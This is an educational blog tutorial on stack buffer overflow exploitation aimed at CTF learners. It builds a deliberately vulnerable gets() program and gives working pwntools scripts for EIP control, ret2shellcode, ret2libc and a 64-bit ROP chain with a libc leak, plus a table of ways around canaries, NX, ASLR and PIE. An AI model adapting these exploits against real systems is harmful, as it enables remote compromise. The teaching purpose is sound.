> Stack Buffer Overflows: From Crash to Shell_
Buffer overflows are the grandfather of memory corruption vulnerabilities. Decades old, largely mitigated in modern software — but understanding them is foundational. They appear in CTFs constantly, they still exist in embedded firmware and legacy systems, and every other exploitation technique builds on the concepts here.
This post assumes basic C knowledge and Linux familiarity. We'll go from a vulnerable program to a root shell.
## The stack, briefly
The call stack is a region of memory used to manage function calls. When you call a function, the CPU pushes a stack frame containing:
High addresses
┌──────────────────────┐
│ caller's data │
├──────────────────────┤
│ return address │ ← where execution returns after the function
├──────────────────────┤
│ saved EBP/RBP │ ← caller's base pointer
├──────────────────────┤
│ local variables │ ← including buffers
│ ... │
└──────────────────────┘
Low addresses (stack grows down)
When gets() or strcpy() writes more data than a buffer can hold, it overwrites the saved return address. When the function returns, the CPU jumps to your address instead of the original caller.
## Vulnerable program
// vuln.c
#include <stdio.h>
#include <string.h>
void vuln() {
char buf[64];
gets(buf); // never use gets() — no bounds checking
printf("You said: %s\n", buf);
}
int main() {
vuln();
return 0;
}Compile with mitigations disabled (for learning):
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vuln vuln.c
# -m32: 32-bit for simpler addresses
# -fno-stack-protector: no canary
# -z execstack: stack is executable
# -no-pie: fixed addresses (no ASLR at binary level)## Step 1: Find the crash
python3 -c "print('A' * 100)" | ./vuln
# Segmentation faultNow use a cyclic pattern to find exactly which offset overwrites EIP:
# Using pwntools
python3 -c "from pwn import *; print(cyclic(200).decode())" | ./vuln
# Segfault
# Find the offset from the crash address
dmesg | tail -1 # shows the faulting address, e.g., 0x6161616c
python3 -c "from pwn import *; print(cyclic_find(0x6161616c))"
# Output: 76 — EIP is overwritten at offset 76Manually with GDB:
gdb ./vuln
(gdb) run < <(python3 -c "print('A'*100)")
(gdb) info registers eip
# eip = 0x41414141 (four A's — confirmed control of EIP)## Step 2: Control EIP
# exploit.py
from pwn import *
offset = 76
payload = b"A" * offset + b"B" * 4 # B's will overwrite EIP
p = process("./vuln")
p.sendline(payload)
p.interactive()python3 exploit.py
# EIP should be 0x42424242 (four B's)## Step 3: ret2shellcode (NX disabled)
When the stack is executable (-z execstack), we can place shellcode in the buffer and jump to it.
Shellcode for a /bin/sh shell (32-bit Linux):
from pwn import *
context.arch = 'i386'
context.os = 'linux'
shellcode = asm(shellcraft.sh())
# Or use pre-written shellcode:
# shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
offset = 76
# Find the buffer address in GDB:
# (gdb) break vuln
# (gdb) run
# (gdb) x/32wx $esp — look for where your input lands
# (gdb) p &buf — or directly get the local var address
buf_addr = 0xffffd4a0 # the address of buf[] in the stack frame
payload = shellcode
payload += b"A" * (offset - len(shellcode)) # padding
payload += p32(buf_addr) # overwrite EIP with start of our shellcode
p = process("./vuln")
p.sendline(payload)
p.interactive()This technique is blocked by NX (non-executable stack). Most modern systems have NX enabled.
## Step 4: ret2libc (NX enabled)
When the stack isn't executable, we can't run shellcode there — but we can call existing executable code. system("/bin/sh") is in libc. All we need is its address and a pointer to the /bin/sh string.
# Find system() address
gdb ./vuln
(gdb) p system
# $1 = {<text variable, no debug info>} 0xf7e3d200 <system>
# Find "/bin/sh" in libc
(gdb) find &system, +999999, "/bin/sh"
# 0xf7f569e8 <-- address of "/bin/sh" string in libcOr from the shell:
ldd ./vuln | grep libc
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
# Returns offset of system() from libc base
strings -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
# Returns offset of /bin/sh stringBuild the payload:
from pwn import *
offset = 76
# Hardcoded addresses (ASLR disabled: echo 0 > /proc/sys/kernel/randomize_va_space)
system_addr = 0xf7e3d200
exit_addr = 0xf7e2e1d0 # return addr after system() — use exit() to clean up
binsh_addr = 0xf7f569e8
# Stack layout after overflow:
# [padding][EIP=system][return_after_system=exit][arg_to_system=/bin/sh]
payload = b"A" * offset
payload += p32(system_addr)
payload += p32(exit_addr)
payload += p32(binsh_addr)
p = process("./vuln")
p.sendline(payload)
p.interactive()## Step 5: ROP chains (ASLR + NX)
When ASLR randomises libc's base address, we can't hardcode system(). We need to:
- >Leak a libc address at runtime (find the real base)
- >Calculate the offset to
system()and/bin/sh - >Return-orient to call
system("/bin/sh")
ROP (Return-Oriented Programming) chains together small code sequences ending in ret ("gadgets") to build arbitrary computation from existing executable code.
# Find gadgets with ROPgadget
ROPgadget --binary ./vuln --rop
# Or with ropper
ropper -f ./vuln --search "pop eax; ret"A full ROP chain for 64-bit with ASLR is more involved — uses puts() to leak a libc address, calculates base, then calls system("/bin/sh").
from pwn import *
elf = ELF("./vuln64")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
rop = ROP(elf)
# Stage 1: leak puts@got to find libc base
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
stage1 = b"A" * offset
stage1 += p64(pop_rdi)
stage1 += p64(elf.got['puts']) # arg: address of puts in GOT
stage1 += p64(elf.plt['puts']) # call puts(puts_got) — leaks libc addr
stage1 += p64(elf.sym['main']) # return to main for stage 2
p = process("./vuln64")
p.sendline(stage1)
# Parse the leaked address
p.recvuntil(b"You said: \n")
leak = u64(p.recvline()[:6].ljust(8, b'\x00'))
libc.address = leak - libc.sym['puts']
log.info(f"libc base: {libc.address:#x}")
# Stage 2: now call system("/bin/sh")
# (ret gadget for stack alignment on 64-bit)
ret = rop.find_gadget(['ret'])[0]
stage2 = b"A" * offset
stage2 += p64(ret) # align stack (required on 64-bit)
stage2 += p64(pop_rdi)
stage2 += p64(next(libc.search(b'/bin/sh\x00')))
stage2 += p64(libc.sym['system'])
p.sendline(stage2)
p.interactive()## Modern mitigations and what breaks them
| Mitigation | What it does | How to bypass |
|---|---|---|
| Stack canary | Random value before return address; checked on return | Leak canary via format string, brute force (fork servers), or overwrite only return addr if canary isn't between |
| NX / DEP | Stack/heap not executable | ret2libc, ROP chains |
| ASLR | Randomises load addresses | Leak addresses at runtime, brute force (32-bit has limited entropy), heap spraying |
| PIE | Binary itself is ASLR'd | Leak binary address, then compute all offsets |
| RELRO (Full) | GOT is read-only | Can't overwrite GOT — must use other write-what-where gadgets |
| SafeStack | Keeps return addresses in a separate protected stack | Rarely deployed, requires compiler support |
Bypassing all of these simultaneously (Full RELRO + Canary + NX + ASLR + PIE) requires multiple vulnerabilities chained together — the typical path is: leak via format string → leak binary/libc base → ROP to one_gadget (a single libc gadget that spawns a shell when constraints are met).
## Essential tools
| Tool | Use |
|---|---|
| pwntools | Python library for exploit development |
| GDB + pwndbg | Dynamic analysis with memory inspection |
| ROPgadget / ropper | Find ROP gadgets |
| checksec | Check binary protections |
| one_gadget | Find magic gadgets in libc that exec a shell |
| patchelf | Change a binary's linked libc for local testing |
checksec --file=./vuln
# Output shows: Canary, NX, PIE, RELRO statusBuffer overflows in 2025 are largely a solved problem in new software — but the exploitation techniques they teach are the foundation of every heap exploit, kernel pwn, and browser bug that still exists. If you're on the CTF track, start here.